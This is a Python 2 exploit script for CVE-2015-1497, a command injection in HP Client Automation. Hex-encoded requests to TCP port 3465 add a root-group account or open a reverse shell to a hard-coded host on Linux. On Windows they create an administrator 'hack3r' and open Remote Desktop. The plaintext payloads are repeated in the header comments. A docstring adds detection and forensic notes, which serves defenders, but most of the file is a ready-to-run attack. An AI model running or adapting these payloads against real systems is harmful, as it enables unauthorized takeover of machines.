# Exploit Title: [HP Client - Automation Command Injection]
# Date: [10/10/2016]
# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Vendor Homepage: [Previously HP, now http://www.persistentsys.com/]
# Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too]
# Tested on: [Windows 7 and CentOS release 6.7 (Final)]
# CVE : [CVE-2015-1497]

#Can run following commands on linux target
#Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root'
#Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

#Runs following commands on Windows target
#hide hide cmd.exe /c net user hack3r "hack3r" /add
#hide hide cmd.exe /c net localgroup administrators hack3r /add
#hide hide cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add
#hide hide cmd.exe /c netsh firewall set service RemoteDesktop enable
#hide hide cmd.exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL
#hide hide cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

r"""
Proof-of-concept for CVE-2015-1497 (HP Client Automation), talking to the
service on TCP/3465 of the target.

Wire format, as reconstructed from the byte strings in this file: every
request is one fresh TCP connection carrying

    "\x00" + "123123\x00" + "ABC\x00" + "hide hide\t<os command>\x00"

and the script treats a reply consisting of exactly one NUL byte ("\x00") as
"command accepted". Nothing else in the response is parsed. The constant
"hide hide" marker followed by a tab and a shell/cmd command is present in
every request, which makes it a straightforward network-detection signature
for traffic to this port.

Host artifacts the encoded commands leave behind (useful for forensics):
  * Linux: a new account "amiroot" in group root (option 1), or an outbound
    connection from the target to 10.10.35.140:443 (option 2; the address is
    hard-coded inside the hex payload).
  * Windows: local user "hack3r" added to Administrators and "Remote Desktop
    Users", the RemoteDesktop firewall service enabled for all profiles, and
    fDenyTSConnections set to 0 under
    HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server.

Written for Python 2: main() uses the print statement, and the payloads are
str objects handed straight to socket.send(). No error handling exists
anywhere; a refused connection or a timeout surfaces as an uncaught
socket.error, and the socket is only closed on the normal path.
"""

import sys,socket

# Banner, printed on every invocation (including the usage-error path).
print("\n# Exploit Title: [HP Client - Automation Command Injection]\n# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\n# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]\n# Version: [7.9, 8.1, 9.0, 9.1]\n# Tested on: [Windows 7, CentOS release 6.7 (Final)]\n# CVE : [CVE-2015-1497]\n")


def exploit_Linux(target_IP,exploit_param):
    # Send a single request to target_IP:3465.
    #   exploit_param == "1": useradd amiroot (group root) via sh -c
    #   exploit_param == "2": reverse shell to 10.10.35.140:443 (hard-coded)
    # Any other value prints an error and terminates the process.
    if exploit_param == "1":
        print("\n[+]Adding privileged user amiroot/nopass")
        # Framing: leading NUL, then "123123", "ABC" and the command, each
        # NUL-terminated.
        request = "\x00"
        request+= "\x31\x32\x33\x31\x32\x33\x00"
        request+= "\x41\x42\x43\x00"
        # Decodes to: hide hide\tsh -c ' useradd amiroot -p ID/JlXFIWowsE  -g root'
        request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x27\x20\x75\x73\x65\x72\x61\x64\x64\x20\x61\x6d\x69\x72\x6f\x6f\x74\x20\x2d\x70\x20\x49\x44\x2f\x4a\x6c\x58\x46\x49\x57\x6f\x77\x73\x45\x20\x20\x2d\x67\x20\x72\x6f\x6f\x74\x27\x00"
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_IP, 3465))
        s.send(request)
        response = s.recv(1024)
        # A lone NUL byte is the only success signal the script recognises.
        if response == "\x00":
            print("[+]Successfully added user amiroot/nopass")
        else:
            print("[-]Failed to add user amiroot/nopass")
        s.close()
    elif exploit_param == "2":
        print("\n[+]Trying to get a reverse shell")
        request = "\x00"
        request+= "\x31\x32\x33\x31\x32\x33\x00"
        request+= "\x41\x42\x43\x00"
        #Change this
        #Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
        # The comment above is only a decoded copy; the listener address
        # 10.10.35.140:443 actually sent is the one inside the hex string.
        request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x22\x70\x79\x74\x68\x6f\x6e\x20\x2d\x63\x20\x27\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x6f\x73\x3b\x73\x3d\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x5c\x22\x31\x30\x2e\x31\x30\x2e\x33\x35\x2e\x31\x34\x30\x5c\x22\x2c\x34\x34\x33\x29\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x63\x61\x6c\x6c\x28\x5b\x5c\x22\x2f\x62\x69\x6e\x2f\x73\x68\x5c\x22\x2c\x5c\x22\x2d\x69\x5c\x22\x5d\x29\x3b\x27\x22\x00"
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_IP, 3465))
        s.send(request)
        response = s.recv(1024)
        if response == "\x00":
            # NOTE: this message was copied from option 1; no SSH account is
            # created on this path, only the reverse-shell command is sent.
            print("[+]Exploit completed successfully.\n[+]Try to SSH into the target with username/password: amiroot/nopass")
        else:
            print("[-]Failed to get reverse shell")
        s.close()
    else:
        print("\n[-]Invalid exploit parameter provided for Linux target")
        sys.exit()


def exploit_Windows(target_IP):
    # Sends six requests to target_IP:3465, one TCP connection each, and
    # counts how many were answered with the single NUL "success" byte.
    # A failed step is reported but the remaining steps are still attempted;
    # the final verdict only checks that all six counted as successful.
    counter = 0
    print("[+]Adding a local user hack3r/hack3r")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    # Decodes to: hide hide\tcmd.exe /c net user hack3r "hack3r" /add
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x68\x61\x63\x6b\x33\x72\x20\x22\x68\x61\x63\x6b\x33\x72\x22\x20\x2f\x61\x64\x64\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
    response = s.recv(1024)
    if response == "\x00":
        print("[+]Successfully added user hack3r/hack3r")
        counter+= 1
    else:
        print("[-]Failed to add user hack3r/hack3r")
    s.close()

    print("[+]Adding user 'hack3r' to Local Administrator's group")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    # Decodes to: hide hide\tnet localgroup administrators hack3r /add
    # (unlike the other five requests this one carries no "cmd.exe /c" prefix)
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
    response = s.recv(1024)
    if response == "\x00":
        print("[+]Successfully added user 'hack3r' to Local Administrators group")
        counter+= 1
    else:
        print("[-]Failed to add user to 'hack3r' Local Administrators group")
    s.close()

    #Add user Hack3r to "Remote Desktop Users" Group
    print("[+]Adding user 'hack3r' to 'Remote Desktop Users' group")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    # Decodes to: hide hide\tcmd.exe /c net localgroup "Remote Desktop Users" hack3r /add
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x22\x52\x65\x6d\x6f\x74\x65\x20\x44\x65\x73\x6b\x74\x6f\x70\x20\x55\x73\x65\x72\x73\x22\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
    response = s.recv(1024)
    if response == "\x00":
        print("[+]Successfully added user 'hack3r' to 'Remote Desktop Users' group")
        counter+= 1
    else:
        print("[-]Failed to add user 'hack3r' to 'Remote Desktop Users' group")
    s.close()

    #Enable RDP
    print("[+]Trying to enable Remote Desktop Service")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    # Decodes to: hide hide\tcmd.exe /c netsh firewall set service RemoteDesktop enable
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x65\x6e\x61\x62\x6c\x65\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
    response = s.recv(1024)
    if response == "\x00":
        print("[+]Successfully enabled Remote Desktop Service")
        counter+= 1
    else:
        print("[-]Failed to enable Remote Desktop Service")
    s.close()

    #Enable RDP for all profiles
    print("[+]Trying to enable Remote Desktop Service for all firewall profiles")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    # Decodes to: hide hide\tcmd.exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x74\x79\x70\x65\x3d\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x6d\x6f\x64\x65\x3d\x65\x6e\x61\x62\x6c\x65\x20\x70\x72\x6f\x66\x69\x6c\x65\x3d\x41\x4c\x4c\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
    response = s.recv(1024)
    if response == "\x00":
        print("[+]Successfully enabled Remote Desktop Service for all firewall profiles")
        counter+= 1
    else:
        print("[-]Failed to enable Remote Desktop Service for all firewallprofiles")
    s.close()

    #Setup target to listen for RDP connections
    print("[+]Setting up the target server to listen to RDP connections")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    # Decodes to (note the double tab after "hide hide"):
    # hide hide\t\tcmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x45\x59\x5f\x4c\x4f\x43\x41\x4c\x5f\x4d\x41\x43\x48\x49\x4e\x45\x5c\x53\x59\x53\x54\x45\x4d\x5c\x43\x75\x72\x72\x65\x6e\x74\x43\x6f\x6e\x74\x72\x6f\x6c\x53\x65\x74\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x5c\x54\x65\x72\x6d\x69\x6e\x61\x6c\x20\x53\x65\x72\x76\x65\x72\x22\x20\x2f\x76\x20\x66\x44\x65\x6e\x79\x54\x53\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x73\x20\x2f\x74\x20\x52\x45\x47\x5f\x44\x57\x4f\x52\x44\x20\x2f\x64\x20\x30\x20\x2f\x66\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
    response = s.recv(1024)
    if response == "\x00":
        print("[+]Successfully setup the target server to listen to RDP connections")
        counter+= 1
    else:
        print("[-]Failed to setup the target server to listen to RDP connections")
    s.close()

    # All six steps must have returned the NUL byte for the run to be
    # reported as a success.
    if counter == 6:
        print("\n[+]Exploit completed successfully. Try RDP to the target with username/password: hack3r/hack3r")
    else:
        print("\n[-]Exploit Failed..")


#main() function here
def main():
    # Usage: <target_ip> Windows   |   <target_ip> Linux [1|2]
    # NOTE: only len(sys.argv) < 2 is guarded; sys.argv[2] (and sys.argv[3]
    # on the Linux path) are read unchecked and raise IndexError if absent.
    if len(sys.argv) < 2:
        # Python 2 print statement; this line is what pins the script to 2.x.
        print "\n[-]Usage: \nWindows Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Windows\n\nLinux Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Linux [1|2]\n\t\t1.Add user\n\t\t2.Reverse Shell"
        sys.exit()
    target_IP = sys.argv[1]
    target_OS = sys.argv[2].lower()
    if target_OS == "windows":
        exploit_Windows(target_IP)
    elif target_OS == "linux":
        exploit_param = sys.argv[3]
        exploit_Linux(target_IP,exploit_param)
    else:
        print("\n[-]Invalid taret Operating System selected.")
        sys.exit()


if __name__ == '__main__':
    main()